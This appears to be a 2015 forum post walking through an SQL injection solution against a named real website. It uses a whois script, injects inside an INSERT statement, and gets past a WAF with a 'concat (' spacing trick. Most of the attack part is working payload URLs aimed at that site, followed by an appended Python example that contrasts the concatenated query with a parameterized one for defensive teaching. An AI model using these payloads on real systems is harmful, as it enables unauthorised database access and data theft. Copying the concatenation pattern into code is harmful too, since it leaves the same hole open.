Kyfx

Special Injection For Dorks

Jun 26th, 2015
I was pretty glad that a lot of people solved that.
That's the solution for those who had a little difficulty.
When we check for a vuln, we put ' after the parameter, like:
Code:
bitextra.com/whois/hosting.php?nodomain=1'

And we got an error:
[Image: QsRYlbw.png]
near 'domain','0','Unknown Domain Name','U')'

When we see all these commas, we understand it's not a regular injection.
It can be two things:
* a select statement with multiple conditions (like in()).
* the injection point is inside an update / insert into statement.

We can verify that by closing the (), and learn from the error we get.
Code:
bitextra.com/whois/hosting.php?nodomain=1')-- -

[Image: q9wBkov.png]

"Column count doesn't match value count at row 1" is an error that appears when an INSERT INTO statement is used wrongly.
Example:
Code:
INSERT INTO cars (id,model,color) VALUES (1,2010);

The number of values doesn't match the number of columns, so we got that error.
It's like error 1222 in a SELECT statement.

So now we understand we're injecting inside an insert into, but how to exploit it?
Well, healthy logic says that the values are returned as the data we see on the page.
Let's find out what columns we can use.
First we gotta count the columns, and we can do it by sight.
Let's insert some wrong value.
Code:
bitextra.com/whois/hosting.php?nodomain=1'aaa
aaa','domain','0','Unknown Domain Name','U')
4 commas, so 5 columns.
Code:
bitextra.com/whois/hosting.php?nodomain=1111',222,333,444,555)-- -

[Image: 3pb5mdc.png]

Column #4 shows up on the page, and so does column #3 (total price: 333).

Let's inject in 4.
Since we can see the column on the screen, it's now a regular injection.
I asked for version and name, and that would be:
Code:
concat(version(),' : mycoolname')
So:
Code:
http://bitextra.com/whois/hosting.php?nodomain=1111',222,333,concat(version(),' : mycoolname'),555)-- -

Not Acceptable!

Oh no :(
A WAF that blocks "concat(", but not "concat (".
Code:
http://bitextra.com/whois/hosting.php?nodomain=1111',222,333,concat (version(),' : mycoolname'),555)-- -
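
Added example (not part of the original paste): the same kind of INSERT built by string concatenation and then with a bound parameter, using Python's sqlite3 as a stand-in for the site's PHP/MySQL code. The table name, column names and helper functions are assumptions; SQLite words the column-count error differently from MySQL.

```python
import sqlite3

# Constructed stand-in for the application's table: five columns, matching
# the five values visible in the error message quoted in the write-up.
SCHEMA = ("CREATE TABLE lookups "
          "(name TEXT, kind TEXT, price TEXT, message TEXT, flag TEXT)")


def insert_concatenated(db, nodomain):
    """Vulnerable pattern: the parameter is pasted into the VALUES list."""
    sql = ("INSERT INTO lookups VALUES ('" + nodomain +
           "','domain','0','Unknown Domain Name','U')")
    db.execute(sql)


def insert_parameterized(db, nodomain):
    """Hardened pattern: the value is bound, so it cannot close the quote,
    add values or comment out the rest of the statement."""
    db.execute("INSERT INTO lookups VALUES "
               "(?, 'domain', '0', 'Unknown Domain Name', 'U')", (nodomain,))


def try_insert(insert_fn, nodomain):
    """Run one insert on a fresh in-memory database and report the outcome."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    try:
        insert_fn(db, nodomain)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    rows = db.execute("SELECT * FROM lookups").fetchall()
    return ("stored", [tuple(str(v) for v in row) for row in rows])


if __name__ == "__main__":
    # Inputs taken from the write-up above.
    for value in ("example.com", "1')-- -", "1111',222,333,444,555)-- -"):
        for fn in (insert_concatenated, insert_parameterized):
            print(fn.__name__, repr(value), try_insert(fn, value))
```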